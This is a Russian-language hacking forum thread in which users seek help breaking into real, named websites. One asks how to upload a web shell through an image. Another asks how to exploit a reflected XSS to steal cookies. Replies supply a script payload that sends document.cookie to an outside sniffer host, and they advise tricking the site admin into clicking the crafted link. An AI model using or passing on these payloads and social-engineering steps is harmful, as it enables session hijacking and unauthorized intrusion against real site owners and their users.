Здраствуйте. Нашол на одном форуме старый альбом. http://forum.psihov.net.ua/store/album Пробовал залить шелл через картинку, не получается. Помогите пж,или подскажыте что можно зделать.
Code: C:\xampp\htdocs\forum\store\album\liders.php Какой смысл ломать что-то стоящее на домашнем серве под виндой?
Ребят подскажите, есть такой сайт http://www.in-vest-group.ru/component/search/%252F?ordering=&searchphrase=all на нем есть уязвимость xss, можно проверить в поле поиск, как дальше куки заполучить? что то не выходит...
вместо <script>alert()</script> пишеш <script> img = new Image(); img.src = "http://ссылка_на_сниф.gif"+document.cookie; </script>
<script> img = new Image(); img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie; </script> так пойдет? я вписываю это в адресную строку, но ошибка со стороны сервера.
Онлайн вариант по ссылке. Link Третий результат в гугле по запросу "Сниффер". Учиться! Учиться! Учиться!
HAXTA4OK куки ведь получаться сразу, или только когда админ сайта зайдет на сайт? просто пока что куков нет...
когда он зайдет на сайт, вернее на ту странице где xss сработает ЗЫ возьми и сам проверь, зайди туда где ты xss прописывал , если придут твои куки значит xss там есть
<script> img = new Image(); img.src = "http://faiki.hut2.ru/s.gif"+document.cookie; </script> Вот такой код, в писываю в адрессную строку, в поле поиска появляется img new image();
прочел тему твою сначала, тьфу, у тебя пассивная а не активная, для этого тебе надо эту ссылку как то впарить админу что бы он по ней прошел, что мало вероятно зы ощущение что ее там вообще нету =\
